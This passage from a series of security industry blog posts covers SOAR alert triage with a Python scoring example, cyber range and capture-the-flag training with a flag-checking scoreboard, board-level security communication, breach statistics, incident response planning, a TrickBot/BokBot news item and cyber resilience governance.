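    """Add business context (what the host is worth) and threat-intel context (known-bad indicators)."""
    case.asset_criticality = ASSET_CRITICALITY.get(case.host, 1)
    case.ti_hits = [i for i in case.indicators if i in TI_IOCS]
    # Constructed scoring: severity weighted by asset criticality, plus a bonus for a confirmed TI match
    case.priority = SEVERITY[case.severity] * case.asset_criticality + (3 if case.ti_hits else 0)
    return case


def triage(raw_alerts):
    """Return (open cases sorted by descending priority, alerts parked because no playbook exists)."""
    cases, parked = [], []
    for raw in raw_alerts:
        case = normalize(raw)
        playbook = RULE_PLAYBOOKS.get(case.rule_id)
        if playbook is None:
            parked.append(case)          # visibility-only rule: nothing for an analyst to act on
            continue
        case.playbook = playbook
        cases.append(enrich(case))
    cases.sort(key=lambda c: c.priority, reverse=True)
    return cases, parked


def isolation_candidates(cases, threshold=12):
    """Hosts whose case is severe enough to hand to an orchestrated endpoint-isolation action."""
    return [c.host for c in cases if c.priority >= threshold]


SAMPLE_ALERTS = [  # constructed alerts in each source's assumed native schema
    {"source": "siem", "rule": "SIEM-1042", "src_host": "fin-db-01", "magnitude": "high",
     "iocs": ["198.51.100.23"]},
    {"source": "dlp", "policy": "DLP-0007", "endpoint": "hr-share-02", "sev": "medium",
     "dest_ip": "192.0.2.77"},
    {"source": "phishing", "reporter_host": "eng-ws-117",
     "hashes": ["e3b0c44298fc1c149afbf4c8996fb924"]},
    {"source": "siem", "rule": "SIEM-9001", "src_host": "guest-wifi-nat", "magnitude": "low"},
]

if __name__ == "__main__":
    open_cases, parked = triage(SAMPLE_ALERTS)
    for c in open_cases:
        print(f"{c.priority:>3}  {c.source:<8} {c.host:<14} {c.playbook:<22} ti={c.ti_hits}")
    print("parked (no playbook):", [c.rule_id for c in parked])
    print("isolate:", isolation_candidates(open_cases))
```

The point of the example is the order of operations: normalize first so every source lands in the same shape, check for a playbook before spending enrichment effort, and only then score. The threshold handed to the isolation step is the place where an organization decides which actions may run without a human in the loop.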

If your function is willing to spend thousands or even millions on SIEM solutions but is not prepared to deal efficiently with the alerts they output, what is the value of that investment? Why wait until your SIEM tool is churning out alerts before realizing that your team is overwhelmed?

Clients of ours that have run parallel SIEM/SOAR proofs of concept (POCs) have saved significant amounts of time and effort compared to those that have undergone an arduous SIEM POC only to have to follow up with another SOAR POC. In one case, a client even decided to switch off its SIEM solution until it had implemented a SOAR tool to help it deal with the torrent of alerts. Given that SIEM and SOAR are two sides of the coin that comprises security operations, why serve these POCs consecutively when they can be executed concurrently?

The post SOAR: The Second Arm of Security Operations appeared first on Security Intelligence.

Why Cyber Range Training Should Be Top of Mind for Your Security Teams

With breaches making headlines every other week, security teams hardly ever have enough time to ramp up and test their defense strategy before a new and more sophisticated attack surfaces. When reputation, revenue and customer trust are at stake, it’s critical for organizations to detect, respond to and manage security incidents effectively. But how can organizations prepare?

Although there is no “magic answer,” incident preparation is key, and testing your incident response (IR) plan can be the difference between success and failure if, or when, a breach occurs. In fact, “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019,” released earlier this month, mentioned that vendors that provide cyber range services “position themselves to successfully deliver strong incident preparation and breach response to their customers.”

The Value of Cyber Range Training

When I joined IBM Security nearly three years ago to build out the X-Force Incident Response and Intelligence Services (IRIS) team, one of my primary goals was to guide the team to focus on core solutions that deliver value to the enterprise. However, I realized that even though our team focused on embedding threat intelligence into our IR engagements and specialized in comprehensive post-breach remediation, we needed to do more.

We needed to offer the next generation of IR preparation and give our clients access to cyber ranges, where they could practice defending against simulated threats in immersive, real-world training scenarios. We wanted to mature the experience for our clients from PowerPoint-driven tabletop discussions to real-world simulated attacks that test multiple dimensions and stakeholders within environments.

We believed these types of simulations more accurately reflected what responding to a breach was actually like — the feeling of being under pressure 24 hours a day during the event, and the pressure to analyze data quickly, provide status updates, speak with the press, work with internal and external legal counsel, and communicate to clients. We believed that if we could create an environment like this and enable our clients to train in it, each one would leave better prepared than they came in.

Let’s dive deeper into a few key reasons why security teams should consider testing their current response capabilities within a scenario-driven, simulated cyber range.

1. Practice Makes Perfect

Cyberattacks change quickly, so training must test your organization’s ability to adapt its actions and be responsive enough to keep up with new attack methodologies. Cyber ranges enable security teams to practice identifying and responding to threats in a real-world environment using a variety of technologies and runbooks. When security teams actively train in environments that effectively simulate a real-world breach, they are more likely to retain the information learned and respond more quickly when an actual breach occurs.

2. Gain Hands-On Experience

Cyber ranges offer an environment for teams to train collectively, improve their cyberdefense skills and gain critical insight into a variety of stakeholder actions within the organization. This tends to improve communication and teamwork across the enterprise because it gives teams a better understanding of what other departments are responsible for. This is critical to building a successful IR team, and it’s difficult to obtain that experience through conventional training simulations.

3. Advance Organizational Security

Training in an authentic but controlled environment can help security teams deal with crisis situations in a rapid manner. Simply put, the more security-savvy your teams are, the better prepared they will be to implement and execute the most efficient security strategy for today and tomorrow.

Fortifying a Defense Starts With People

Organizations are relying more and more on people as their first line of defense. Although the maturity of effective security technology is growing, it’s still important for cybersecurity teams to train their response in realistic and immersive environments. Cyberthreats won’t stop, so your security teams shouldn’t either. By leveraging cyber range training and bolstering your incident response strategy, your organization can evolve its approach and proactively defend against rapidly evolving threats.

The post Why Cyber Range Training Should Be Top of Mind for Your Security Teams appeared first on Security Intelligence.

Capture the Flag Competitions Can Help Close the Security Skills Gap

I first learned about gamification in college when I attended a talk about internship opportunities at IBM. Jason Flood and William Bailey, members of the security teams at IBM Collaboration Solutions (ICS) and Industry Solutions, made a great impression on me when they spoke about capture the flag (CTF) events they were building for students and the IT industry.

What really piqued my interest was how gamification and capture the flag events could teach people about security in a learning environment without a lot of pressure. I was what you would describe as a new collar candidate. I hadn’t gone straight into college after my primary education, instead going into the workforce as a laborer and truck driver. But I decided to go back to school to retrain and rewire my brain for new skills in the IT world.

I’ve always had an affinity for electrical things and learning how they worked. I was grounded once as a kid for taking apart the clothes iron and reassembling it in a nonconventional way. IT seemed to be the next logical progression in my career, where I could break stuff intentionally. After an internship at IBM, I was luckily accepted into the ethical hacking team in the Dublin, Ireland lab at the ripe old age of 33. The ethical hacking team at that time was very involved in providing cybersecurity education and CTF frameworks for universities and conferences throughout the U.K. and Ireland. Some members of that team have gone on to join IBM X-Force Red. It was during this time that I really caught the gamification bug.

Gamification and Capture the Flag: What Are They?

Most people interact with some form of gamification in their daily lives. What is it? Gamification — the application of game-design elements and game principles in nongame contexts — taps into that natural human need to play, improve and maybe win sometimes. For example, we use gamification when we collect coupons at the store, participate in loyalty programs and use fitness apps. Gamification is also used in the education system — think student rankings based on GPA, dean’s lists, honor rolls, scholarships, etc.

A capture the flag exercise is a gamified set of challenges designed to teach cybersecurity skills in a variety of categories. CTF events generally have a mixture of professionals and students participating. The types of CTF are Jeopardy-style, attack-defense and mixed.

Jeopardy-Style CTF

In a Jeopardy-style CTF, participants take on challenges in a range of categories, including application security, forensics, reverse engineering, cryptography and more. Teams discover “flags” and submit them for points. Challenges get progressively harder and teams earn more points based on the level of difficulty.

Attack-Defense CTF

In an attack-defense CTF, competitors attempt to compromise systems and services with known vulnerabilities. Once a team has compromised a system, it must then defend that system against opposing teams. Participants perform the actions of a red team (attackers) and switch to the blue team (defenders) seamlessly. This game can be continuous and run for many days.

A mixed CTF is a combination of both Jeopardy and attack-defense.

Many of the challenges in CTFs are built around the OWASP Top 10 Application Security Risks or the SANS Top 25 Most Dangerous Software Errors, which give participants a feel for real-world vulnerabilities that many industries have to contend with.
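To make the Jeopardy-style mechanics concrete (flags submitted for points, with harder challenges worth more), here is an added example of a small flag-checking scoreboard. It is not code from the original post or from IBM’s CTF framework; the challenge set, point scale, team names and server secret are constructed. Two details a practitioner would want are included: each team’s flag is derived with an HMAC over the team and challenge IDs, so a flag copied from another team is worthless, and submissions are compared in constant time.

```python
"""Added example: per-team HMAC flags and a difficulty-weighted scoreboard (constructed data)."""
import hashlib
import hmac
from collections import defaultdict

SERVER_SECRET = b"constructed-secret-do-not-reuse"   # assumption: fetched from a secret store in practice

CHALLENGES = {  # constructed challenge set; points scale with difficulty
    "web-sqli-login": {"category": "appsec", "difficulty": 1},
    "pcap-exfil": {"category": "forensics", "difficulty": 2},
    "rev-keygen": {"category": "reversing", "difficulty": 3},
}
POINTS = {1: 100, 2: 250, 3: 500}


def make_flag(team_id: str, challenge_id: str) -> str:
    """Per-team flag: HMAC-SHA256(secret, team:challenge). Sharing flags between teams gains nothing."""
    mac = hmac.new(SERVER_SECRET, f"{team_id}:{challenge_id}".encode(), hashlib.sha256).hexdigest()
    return f"flag{{{mac[:32]}}}"


class Scoreboard:
    def __init__(self):
        self.solves = defaultdict(set)   # team -> set of solved challenge IDs
        self.log = []                    # (team, challenge, outcome) audit trail

    def submit(self, team_id: str, challenge_id: str, flag: str) -> str:
        if challenge_id not in CHALLENGES:
            return "unknown-challenge"
        if challenge_id in self.solves[team_id]:
            return "already-solved"      # no double points for resubmitting
        expected = make_flag(team_id, challenge_id)
        # Constant-time comparison so response timing does not leak how much of the flag matched
        if not hmac.compare_digest(expected.encode(), flag.encode()):
            self.log.append((team_id, challenge_id, "wrong"))
            return "wrong"
        self.solves[team_id].add(challenge_id)
        self.log.append((team_id, challenge_id, "correct"))
        return "correct"

    def score(self, team_id: str) -> int:
        return sum(POINTS[CHALLENGES[c]["difficulty"]] for c in self.solves[team_id])

    def ranking(self):
        return sorted(self.solves, key=self.score, reverse=True)


if __name__ == "__main__":
    board = Scoreboard()
    board.submit("alpha", "web-sqli-login", make_flag("alpha", "web-sqli-login"))
    board.submit("alpha", "rev-keygen", make_flag("alpha", "rev-keygen"))
    board.submit("bravo", "pcap-exfil", make_flag("bravo", "pcap-exfil"))
    # bravo tries alpha's flag for the reversing challenge: rejected
    print(board.submit("bravo", "rev-keygen", make_flag("alpha", "rev-keygen")))
    for team in board.ranking():
        print(team, board.score(team), sorted(board.solves[team]))
```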

How CTF Events Can Help Recruit and Train Cybersecurity Experts

The value of CTFs in terms of cybersecurity awareness, training and education is evidenced by the number of CTF events out in the wild today and the caliber of participants. CTFs are valuable for sharpening the skills of technical operators. Just like athletes who constantly train to stay in top shape, cybersecurity experts need to keep on top of their game.

From attending and building CTFs myself, I have seen how they can be used to train new hires and employees and as a tool for recruitment. Given the impending global cybersecurity skills gap that’s expected to reach approximately 3.5 million unfilled jobs by 2021 and attacks rising year after year, as a community we need to engage people sooner in the career pipeline. This is why the new collar approach — considering job candidates who lack a college degree or cybersecurity background — is so vital.

I’ve also seen how CTFs can provide an opportunity for a company to interview large numbers of people in a safe and controlled environment. I’ve observed recruiters from many companies walk the CTF floor asking people questions during an event. The benefit for recruiters is that they can witness participants showcasing their technical, social and teamwork skills in person. Recruits can discuss vulnerabilities and demonstrate how they compromised systems, how the team broke down tasks and how they solved them.

The environment of a CTF is relaxed and fun, which enables people to show their social side. This environment removes the pressure of an interview, where you’re sitting in a chair in a small room, slumping awkwardly in an ill-fitting suit and hoping you don’t answer any of the questions wrong. The CTF is the place where you can make mistakes, hone your skills and become a better professional.

Engaging and Training the Next Wave of Cyber Professionals

I am lucky enough to have been part of many CTF events over the years, and I’ve seen the concept evolve into an amazing platform for engaging employees, raising awareness and training the future cyber workforce. I am also lucky to be part of IBM’s world-class X-Force Command special forces team as a gamification engineer.

IBM Security is at the forefront in the gamification space, as is evident from the unique facilities we have in the X-Force Command Cyber Range in Cambridge, Massachusetts and the X-Force Command Cyber Tactical Operations Center (C-TOC), a security operations center (SOC) and cyber range aboard an 18-wheeler tractor trailer, now touring Europe.

Our gamified breach simulations immerse participants in a scenario that brings them as close to the endgame as possible. In this high-pressure scenario, clients can test their processes, identify gaps in their security plan and train the muscle memory that is required for when worst happens.

My small part in this well-oiled machine is to provide the technical aspects of the cyber range offerings, building out attack scenarios in the attack-defense challenge we call Cyber Wargame. I also work on developing CTF events within IBM’s own CTF framework, doing my part to help engage and train the next wave of cyber professionals here at IBM.

It’s exciting to do this work for IBM, but I also enjoy taking my experience creating CTFs outside of my job. Last month, I was honored to have the opportunity, along with the Irish branch of the nonprofit security organization Honeynet Project, to support the inaugural cybersecurity competition at the Ireland Skills Live event. WorldSkills competitions have been running since 1950, but this was the first event in Ireland, with teams from universities across the country competing for a chance to represent the nation at a future event in a global WorldSkills competition.

The upcoming graduates’ passion for cybersecurity and vast array of knowledge was clear. Participants told me they had played in many CTFs and that they feel it gives them a better chance at employment. The interest from spectators was very high too, which was one of my main goals for this event. I really wanted to raise awareness among the public and remove some of the mystique around cybersecurity, while correcting the Hollywood notion some people have of cybersecurity.

The event was a success from a recruitment perspective, with many colleges and schools requesting an on-site event for their students. Parents and their kids asked for resources and locations where they could get more information and participate.

The security community offers many opportunities for information sharing, learning and networking, and none more so than a CTF event. Events like this can only help in tackling the cybersecurity skills gap going forward.

Discover How IBM X-Force Command Helps Teams Prepare for a Breach

The post Capture the Flag Competitions Can Help Close the Security Skills Gap appeared first on Security Intelligence.

The Language of Business: Where the Board of Directors and Security Leaders Can Meet

A few years back, a business association asked me to deliver a cybersecurity presentation. I knew some in attendance would report back to their respective board of directors, and I expected it to be a challenging session because cybersecurity knowledge and literacy would be all over the map.

It’s a situation I’ve encountered regularly. I remember in one session with about 40 people, I asked what they thought “cybersecurity” meant. Somehow, I think I got 45 different answers. Even within an organization’s board of directors, people who absolutely need to be part of the cybersecurity conversation today, you’d likely get the same variance in responses.

But I welcomed the session because it gave me an opportunity to pilot a new presentation tactic. The presentation focused more on business in general and business development as opposed to cybersecurity, and the presentation style was so outside-the-box, I was actually nervous.

To Engage the Board, Talk Business, Not Cybersecurity

Going in, I knew some of the attendees expected to hear some cybersecurity techno-babble. I did none of that. Instead, I used the simplest possible language and cartoons to disarm these senior leaders for one reason: I wanted them to feel comfortable and able to talk freely about that bogeyman topic, cybersecurity.

By focusing on business and risk instead of cybersecurity, everybody in the room was fully tuned in. Cybersecurity was just color.

You see, by avoiding the technical nature of cybersecurity, the participants made the mental jump from “cybersecurity as an IT issue” to “cybersecurity as a business and risk issue.” They saw how cybersecurity issues could impact and influence their business development plans or pose growth problems. I remember one participant emphatically saying to the group, “You just made me understand this cybersecurity thing isn’t my IT department’s problem … it’s my problem!”

And just like that, you have a new teammate.

CSOs Are From Mars, CISOs Are From Venus and the Board of Directors Are From Andromeda

There has been a great deal of discussion on whether you should have a chief information officer (CIO), chief security officer (CSO) or chief information security officer (CISO), who should do what, what reporting chains should look like, and the need for this type of specialist. The good news is that there is increased interaction between these security leaders and CEOs and the board of directors. It’s a step in the right direction.

But interaction is not enough; it’s speaking the same language that matters. To do that, you actually need to know what you’re in the business of. No two organizations are alike.

As a general observation, I’ve found that security professionals sometimes have difficulty understanding what drives business in their organization. Reading financial statements and appreciating the importance of cash flow may not be core competencies of security teams, but in practice, they should be.

The same can be said for understanding supply chains, knowing who the key customers and vendors are, and determining which costs can really impact the organization’s ability to generate revenue or meet its business mission. These are all issues that senior leaders and the board of directors care about.

Now, these same issues do not necessarily fall within a security professional’s area of responsibility, but the ability to demonstrate business acumen gives the security professional incredible influence with these other players. Therefore, if security employees can demonstrate that they have more than a one-track mind, they may suddenly find more allies within the organization.

Your Job Is to Keep the Business Going

To keep the business going, you need to know how it works. That’s why asking the right business operations questions will make all the difference. You shouldn’t be asking your colleagues, “How long can you go without a computer?” (The answer almost certainly will be, “I can’t.”) Instead, you should be asking, “You don’t have a computer for 72 hours, how do we keep the business going?” Or, “If we lose network capability for 48 hours, how do we survive the downtime?” You get the idea. Note the emphasis on teamwork.

Ask the right questions the right way and you’ll be better prepared to:

To Improve Your Cybersecurity Posture, You Need to Understand the Business

Most successful business leaders understand that rocky times are part of the normal business cycle. The best even expect rocky times, especially during business development phases. That’s not what worries them.

What worries them is if the organization has the ability and resources to weather the storm. For this reason alone, IT and security professionals need to be able to talk business to the C-suite and the board of directors, especially if new security products need to be added into the organization’s portfolio.

Make Life Easy for Your Board of Directors

With increased pressure on the board of directors to play a more active role in cyber risk governance, it is incumbent on internal cybersecurity professionals to learn what makes the organization tick by talking return on investment, cost, growth metrics, cash flow, business development, resource management and so on. If you can speak the language of business, you are better positioned to demonstrate the value of cybersecurity investments to senior leaders. You’re making their life easier, which in turn makes your life easier.

So whether it’s a few online business basics and governance courses or talking with your nonsecurity colleagues about what drives the business, it’s a worthwhile investment in the grand scheme of things.

I understand these business spaces can sometimes make security employees uncomfortable. But if you can master the business language, you’ll suddenly find yourself not galaxies apart from your C-suite colleagues and board members, but rather in the same room, working together to meet the most pressing cybersecurity and business needs of the organization. That’s a good place to be.

The post The Language of Business: Where the Board of Directors and Security Leaders Can Meet appeared first on Security Intelligence.

Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches

The first quarter of every year produces dozens of reports that both reflect on the threats of the previous year and look ahead to understand how to avoid future security breaches. No single report can offer a foolproof approach to data protection, but the findings in the Identity Theft Resource Center (ITRC)’s “2018 End-of-Year Data Breach Report” serve as a stark reminder of why companies should take a layered approach to security.

A notable and somewhat confounding takeaway from the report was that, despite fewer reported data breaches compared to the previous year, 2018 saw a 126 percent uptick in the number of records breached containing personally identifiable information (PII). In many cases, these breaches were the result of the continued use and reuse of passwords and usernames, as well as vulnerabilities caused by third-party vendors.

How can industry leaders turn last year’s surge in stolen records into a record-breaking year of cybersecurity success?

The Perfect Cyber Threat Storm

Unfortunately, a lack of budget and skilled staff remains the top reason why many organizations lag in their overall security posture. All the while, today’s cybercriminals are monetizing their activities in increasingly creative ways.

Additionally, the report found that consumers are continuing to choose convenience over security, believing that it is the business’ responsibility to protect the data it collects. That’s why only safeguarding networks is not enough, according to Byron Rashed, vice president of marketing at Centripetal Networks.

“It’s a combination of layered security best practice and user cybersecurity education that will greatly mitigate risk,” said Rashed. “From phishing to ransomware, the attackers’ schemes have become more complex and, in many circumstances, extremely damaging. Add into the equation human error and you now have the perfect cyber threat storm.”

A Familiar Weather Pattern of Data Breaches

What some might see as the brewing of a perfect threat storm, others recognize as a familiar threat. Here, the old adage that hindsight is 20/20 rings true, and it gives defenders a slight advantage. Armed with the insight of what went wrong last year, security professionals can be more proactive in building defense in depth. The enormous jump in the number of exposed sensitive records indicates that organizations should strengthen their data privacy efforts. Looking at a breakdown of the types of compromises from the ITRC report, 39 percent of breaches resulted from hacking and 30 percent resulted from unauthorized access.

Understanding attack methods will inform mitigation, but it’s also important to push through fear, uncertainty and doubt to see that things may not be as bleak as they appear. After all, the report did find that the actual number of data breaches fell by 23 percent from 2017. The business industry, which had the largest number of breaches, also had the fewest records exposed.

“Yes, hackers continue to succeed at stealing more records, but really, how many times can they steal the same Social Security number?” said John Gunn, chief marketing officer at OneSpan. “More importantly, the methods for verifying the identity for someone conducting a remote digital transaction have experienced huge gains in the past year with biometric and behavioral techniques enhanced by artificial intelligence (AI).”

While threat actors may be getting more data, banks and merchants are getting better at stopping the fraud these cybercriminals would otherwise commit with that compromised data, according to Gunn. By sharing massive amounts of information, financial institutions can leverage AI, machine learning-based analyses and anti-fraud platforms to enable the detection of new malware threats and previously hidden attacks in real time.

Build a Foundation of Proactive Cybersecurity Measures

There is arguably no way to say that any particular security strategy can completely prevent a cyberattack, but there are many ways companies can prepare for threats so they are better able to detect and respond to cyberattacks when they do happen.

“Organizations need to build a foundation of proactive measures, such as frequent employee training, preventative security controls and staying up to date with industry best practices,” said Andy Wright, regional director, Northern Europe for Check Point.

Because innovation is moving so swiftly, keeping abreast of industry best practices can seem like a full-time job on its own. Added to that is the reality that attackers are constantly evolving their campaigns, often exploiting zero-day vulnerabilities with attacks that have no known signature — meaning they evade the detection of most antivirus tools.

Making everyone within the organization aware of security risks to the company will help create a security-aware culture in which end users are encouraged to report security issues without the fear of negative consequences. “Reporting a human error early on can help identify and prevent intrusions, which will stop the attack earlier in the kill chain,” said Chad Cragle, information security officer at FormAssembly. If employees feel that their jobs are not at risk for reporting human errors, they are more inclined to share useful information with the security team.

Part of training employees includes education about spear phishing and common malware exploits so that workers are familiar with and better able to identify these threats — and also less likely to fall victim to newer, emerging threats. When employees know what to look for, they are more risk-aware and more likely to report errors early on.

In addition, implementing password updates and two-factor or multifactor authentication will help mitigate the risk of unauthorized access to systems and resources.

“This can be supported by using encrypted PCs and devices. These measures should also be extended to third-party vendors to ensure they’ve enabled the proper security protocols that prevent hackers from accessing their network and jumping across,” Wright said.

Fight the Storm With a Layered Approach to Security

Organizations can build defense in depth through a layered approach to security, which includes intrusion prevention and threat detection and response tools, encryption, access controls, and data loss prevention tools. Because security is not only about technology, it’s also important to think about defense as it relates to people and processes. Another critical piece of preventing and blocking threats is having clear policies that are tested and consistently updated, particularly when it comes to risk management and software updates.

If your security program has all these aspects, you’re well on your way to helping make 2019 a record-breaking year of cybersecurity success.

The post Let’s Make 2019 the Year of Fewer Records Compromised in Data Breaches appeared first on Security Intelligence.

When It Comes to Incident Response, Failing to Plan Means Planning to Fail

If there’s one thing I’ve learned from working in cybersecurity, it’s that security incidents do not simply occur, they are caused — either by legitimate users who unintentionally expose company data or malicious actors who seek to breach enterprise systems undetected. Unfortunately, it is much easier for attackers to identify exploitable vulnerabilities than it is for security teams to fix every flaw in the company’s network.

While it would seem the odds are insurmountably stacked against cyberdefenders, there is at least one element of an effective incident response program that even the most ingenious attackers cannot take away from security teams: preparedness and thorough planning.

Why the Time to Contain a Breach Matters

One of the most important metrics in incident response is the time it takes to respond to and contain a security event. According to the “2018 Cost of a Data Breach Study,” the costs associated with a breach were 25 percent lower for organizations that managed to contain the incident within 30 days. That’s a difference of more than $1 million when you consider the overall average cost of a breach, which is particularly concerning since the average time between detection and containment is 69 days.

This so-called mean time to contain (MTTC) depends on the organization’s level of preparedness to rapidly switch into emergency response mode and execute the right tasks in the right order — all under the intense pressure and confusion that invariably arises from a crisis situation. That’s why MTTC is a crucial metric in any emergency response plan template.

6 Steps to Strengthen Your Incident Response Plan

Companies with a mature security posture don’t just take a proactive approach to mitigating threats, they also train their employees on what to do in a worst-case scenario and how to implement a break-glass policy within their organizations. This requires security leaders to continuously review their plans for gaps and inefficiencies and adjust them accordingly to thoroughly understand the impact of a potential breach from a remediation perspective.

Below are six key steps organizations can take to step beyond proactive measures and prepare to respond in a worst-case scenario.

1. Get Management Support

An incident response plan does not just apply to IT and security. You will need cooperation and resources from people outside the security organization, including legal, human resources and other departments.

2. Know Your Risks

To develop your incident response plan, you must understand the kind of events you are addressing and their potential impact to your organization. The loss and exposure of data is one example that is critical to virtually all companies, and not just since the General Data Protection Regulation (GDPR) took effect. Other risks to consider include production outages, flawed products and third-party breaches. Security leaders should work closely with risk officers to identify the threats with the greatest potential business impact.

3. Define Roles and Responsibilities

It takes a lot of hard work from a variety of people and business functions to identify, contain and eradicate an incident. Roles must be clear in advance, and everyone must know his or her responsibility in the event of a security incident.

Typically, this is where a predefined group of response specialists, known as a computer security incident response team (CSIRT), steps in. In addition to security experts, this team should include representatives from management as well as other business units.

4. Determine Communication Channels

In case of emergency, it’s critical to define the relevant communication channels. Communication channels must be open at all times, even if the normal channels are compromised or temporarily unavailable. It’s also important to establish guidelines for what details should be communicated to IT, senior management, relevant departments, affected customers and the public.

5. Rules of Engagement

A lot can go wrong during incident response activities. Valuable information can be destroyed through recklessness and thoughtlessness or, worse, by an attacker who is just waiting to exploit poor user behaviors. Therefore, incident response steps should follow a clear structure and methodology, such as the SANS Institute’s six-step incident response framework and other publicly available resources that can be adapted to fit an organization’s unique needs.

6. Train the Plan

The worst thing you can do is wait until a crisis occurs to execute your incident response process for the first time. Tabletop exercises and run books are always beneficial, but it is most critical to regularly drill the response flow and strive to improve its results in every subsequent drill. It’s also helpful for team members to join discussion groups and share successful practices with other teams to sharpen incident response plans and reduce the potential damage from an impending attack.

The Benefits Outweigh the Costs

While a break-glass policy can add more layers of protection in the event of a breach, it also adds to the workload of your already overwhelmed staff. That’s why many organizations are hesitant to step forward. But the benefits of containing the damage within a short period of time outweigh the value of this investment by far. By adapting a tried-and-true emergency response plan template to your organization’s incident response needs and business goals, you will be in a much better position to minimize the damage associated with a data breach.

The post When It Comes to Incident Response, Failing to Plan Means Planning to Fail appeared first on Security Intelligence.

TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks

Security researchers warned that the cybercriminals behind the two banking Trojans are now collaborating to perform man-in-the-middle (MitM) attacks.

On March 17, CrowdStrike discovered a BokBot proxy module called shadDll in conjunction with TrickBot. The code for the two banking Trojans is 81 percent similar, the researchers said, which means the proxy module can be seamlessly integrated into TrickBot’s extensible, modular framework. It’s possible the two threat groups have been collaborating on an ongoing basis, the researchers added.

Adding New Features Through Threat Group Collaboration

After infecting a machine by duping victims into installing malware via phishing messages, TrickBot can use the shadDll module to access networking functions and install illegitimate Secure Sockets Layer (SSL) certificates. At this point, it can do many of the things BokBot can do, including intercepting web traffic and redirecting it, taking screenshots to steal personal information, and injecting other malicious code.

The researchers have attributed the BokBot Trojan to a cybercriminal group called Lunar Spider, while TrickBot is believed to have been created by a group called Wizard Spider. TrickBot, which first emerged in late 2016, has proven highly versatile in attacking financial services firms, and Wizard Spider may include members of the group that developed the earlier Dyre malware, according to CrowdStrike.

How to Stay Ahead of TrickBot’s Tricks

The “IBM X-Force Threat Intelligence Index” for 2019 identified TrickBot as the most prevalent financial malware family of last year, representing 13 percent of all campaign activity. This was in part due to the ability of various threat actors to make use of the Trojan’s variants. For example, the report showed that IcedID distributed TrickBot within its own botnet in a 2018 campaign. However, experts noted that proper security controls, regular user education and planned incident response can help keep this threat at bay.

X-Force researchers also discovered that TrickBot has been used to steal cryptocurrency, and distribution of the BokBot module may make it even more popular. Organizations should employ advanced malware protection to receive alerts for high-risk devices and notifications when malware has been detected to ensure this cooperation among cybercriminals doesn’t lead to even deadlier attacks.

The post TrickBot Creators Collaborate With BokBot to Conduct Man-in-the-Middle Attacks appeared first on Security Intelligence.

Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort

Cyber risks have been a top concern of global leaders for a while now, with cyberattacks appearing four times as a top-five risk by likelihood in the past decade. This year, leaders ranked two technological risks in the top 10 by impact: cyberattacks in seventh place and critical information infrastructure breakdown in eighth place. To combat these global risks, organizations must improve their cyber resilience efforts.

In February 2019, the World Economic Forum (WEF) released a special report titled “Cyber Resilience in the Electricity Ecosystem: Principles and Guidance for Boards,” which supplements a prior report on cyber resilience issued in 2017. In light of the interconnectedness of organizations and ecosystems today, I’d argue that the report’s main principles can apply well beyond the electrical industry. Examples of other ecosystems that could be severely disrupted — or, worse, catastrophically impacted — by cyberattacks or cyber failures include the global banking sector, global stock exchanges, and the transportation sector and its supporting infrastructure.

We Need a Systemwide View of Resilience

Of course, it is easier to mentally conceive of the impacts of cyber risks on the electrical grid as they relate to our way of life; many of us have had the displeasure of living through a blackout, where the noise of our busy lives suddenly gives way to the deafening silence of a powered-down world. However, as organizations begin to understand and take stock of the interconnectedness of their supply chains and the intricate nature of their business partnerships, the cyber risk discussion must evolve from internally focused defenses and reactions into a larger systemwide view of resilience.

To help guide global stakeholders — government leaders, boards of directors, top leadership, and IT and security leaders — the WEF resilience report provides a number of principles that organizations should follow and governments should keep a close eye on. Failure to act now, while we still can — and can do so at a reasonable cost — could lead to systemic shocks and engender cascading failures on a scale never seen before.

While the idea of “stress tests” has been used many times in the financial sector, its applicability to our connected world is long overdue. But it all starts at the top, with a strong governance principle.

The Governance of Cyber Resilience

Over the past decade, there has been a shift in the boardroom to pay increasing attention to the issues of cybersecurity and cyber risks. Instead of leaving those issues for IT to deal with, board directors have rightfully become more engaged in overseeing management’s activities and, by extension, ensuring that the organization is as cyber resilient as it needs to be.

At the board level, resilience in the cyber realm isn’t about asking, “Are we doing something?” or, “What are we doing?” but rather, “How well are we doing?” and, “How do we know we would be able to recover from a cyber outage?” The WEF report provides several questions for boards to ask of top leadership and chief information security officers (CISOs), such as:

  • How much operational technology (OT) do we have? How much crossover is there between OT, IT and physical security? Could an issue in one domain move into another?
  • Have roles and responsibilities for each area — resilience for IT, OT and physical — been defined? How well do these areas collaborate or integrate with one another, as opposed to operating in silos?
  • What processes and structures are in place to “ensure a coordinated cyber resilience strategy” across the organization?

For the CISO, this is an opportunity to be more of a strategic partner and adviser to top leadership and the board, to shed much-needed light on just how well the organization is prepared to detect, contain and recover from a cyber disruption. However, having the board’s support is key to helping the CISO break what are otherwise longstanding barriers and the “this is how we’ve always done it” attitude. With that support, the CISO can work to integrate cyber risk management into all business decisions.

Resilience by Design

One of the most striking differences between IT and OT is their very different design imperatives. Most of IT was designed with short component lifetimes (3–5 years), a preference for confidentiality (at least when compared to expectations for OT components), and expectations that delays, while inconvenient, are part of the IT ecosystem as components are replaced, upgraded or simply patched.

By contrast, OT components are designed to last 10 to sometimes 20 years, with high-availability requirements under near real-time conditions, meaning there’s never a good time to take OT systems down for maintenance or patching.

It is thus critical to design and deploy cyber resilient components for new IT and OT systems and closely monitor existing systems already in place. On this front, board directors are told to ask questions such as:

  • How are cyber risks considered and accounted for at the onset of new projects and in current operations, across the business?
  • How does management ensure that appropriate controls have been put in place, and how is the effectiveness of those controls evaluated and monitored? Just how cyber resilient are current systems?
  • How does leadership communicate the importance of cyber resilience throughout the organization and enable cross-functional information flows?

The good news is that boards and management can empower their CISO and the rest of the security function to take the lead on providing answers to these questions. The bad news is that looking at the organization as an island isn’t the right approach; we must consider the whole ecosystem.

Reciprocal Impacts Between Organizations and Ecosystems

Boards are also coming to grips with the reality that compliance isn’t sufficient to safeguard their organization’s operations and profits given the complex, highly interconnected ecosystems they operate within. With this realization, boards are asking better questions and engaging in enterprise risk conversations to drive important topics, such as the availability and distribution of security resources and budgets, and a more holistic approach to enterprise risk management that goes beyond compliance to also include risk appetite and alignment with organizational goals and strategy.

Beyond the internal focus, boards are also asking top leadership to look outward, to ensure that management is aware and understands how changes and disruptions in the ecosystem can impact the organization and, conversely, how disruptions in the organization’s own IT and OT could impact the wider ecosystem.

